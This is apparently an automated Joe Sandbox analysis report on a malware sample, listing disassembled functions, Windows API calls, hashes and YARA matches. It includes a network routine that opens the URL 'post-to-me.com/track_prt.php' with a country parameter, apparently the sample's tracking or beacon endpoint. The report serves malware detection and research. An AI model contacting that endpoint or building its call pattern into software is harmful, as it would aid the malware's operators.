                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                    • Instruction ID: 9a3c51a60d06f16650d1caf8f9120340b81595b8a69831e9c2debcad55390e09
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DF0A93554560137D3976735AD08B5B3A2A5BC2F72F15012BFF19923D0EFE58502852D
                                                                                                                                                                                                                                                                    Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                                                    Function 024D7B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024D29A4: TlsGetValue.KERNEL32(?,?,024D0DC2,024D2ECF,00000000,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29AA
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024D7BB1
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024E1241
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024E125A
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024E12D0
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024E12D8
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024D7BBF
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024D7BC9
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024D7BD3
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D7BF1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction ID: 867b4cbcb40bb9fef121233d3b941c9342489eeb9237402ea33e71104e5b057d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0CD31A002186BCE15F6B6883096EF66B9F90B18B00426FD81193350EF759E058E92
                                                                                                                                                                                                                                                                    Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                                                    Function 024FA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0C4
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0D6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0E8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0FA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA10C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction ID: e340d9007967ed4bd606896aeee9c1a880dc97dc3131bbcc651501c383917ea9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF06232505220ABC6F0EF55F9C6C0777DAAA84750764495BF20CD7F11CB71F8908E59
                                                                                                                                                                                                                                                                    Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                    • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                                                    Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                    • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                                                    Function 024F1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F19AF
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F19C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F19D4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F19E5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F19F6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                    • Instruction ID: 6869a7c4f8497a9b7b8f534d9fe8f1c4dbe1c2d9472886b302d88895b5fc6f58
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DF01D70D003519BEFA16F15AC808053F61AF49B2270002ABF506977B2C774E962DF8E
                                                                                                                                                                                                                                                                    Function 024DCF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024DCF36
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024DCF67
                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 024DCF70
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024DCF83
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024DCF8C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                    • Instruction ID: b16b1bd0d0456a332b3d340756669b31de222dd3f2c3c1c1776490674a3bfd15
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F03037200900DBC625EF62EAB09BBB7B6AFC4610311455FE58B47690CF21A947DF62
                                                                                                                                                                                                                                                                    Function 024C2E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2E8E
                                                                                                                                                                                                                                                                      • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1328
                                                                                                                                                                                                                                                                      • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1344
                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024C30A1
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                    • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                                    • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                    • Instruction ID: f05beb3b11f4c0e47bf741c133908e9299e3723d66f157796b0292566a97524b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E515195E55344A8E320EFB0BC45B722378EF58712F10643BD518CB2B2E7A19984875E
                                                                                                                                                                                                                                                                    Function 024E8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 024E896A
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 024E8A23
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: fB$csm
                                                                                                                                                                                                                                                                    • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                    • Instruction ID: 2b22da791d5a1038650e9ea005772fa76e1e40a14662d232c12186aae9164693
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85410A30E00248DBDF10DF29C884AAE7BB5BF45329F14819BD9165B3A1D732D905CF91
                                                                                                                                                                                                                                                                    Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rHrG691f7q.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1060384687
                                                                                                                                                                                                                                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                    • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                                                    Function 024EF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rHrG691f7q.exe,00000104), ref: 024EF9BA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024EFA85
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024EFA8F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1060384687
                                                                                                                                                                                                                                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                    • Instruction ID: eed9d8da3458f827b679989f76b2a02d92141da3ab53bd442370fc2d1ad8dee6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF319171A00258EFEF21DF95DC80D9EBBFCEF89711B1140ABE8069B611D7709A44CB90
                                                                                                                                                                                                                                                                    Function 024CC87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024CC8DE
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                    • Instruction ID: 4252017ded8726e170fee71175b1785dce1c3a3aaddb5bbf7a51625ffce3b299
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F08B728042086ACB80E55CCD81BEB33989B01302F24802FDD0AAB182EB689946CBB0
                                                                                                                                                                                                                                                                    Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
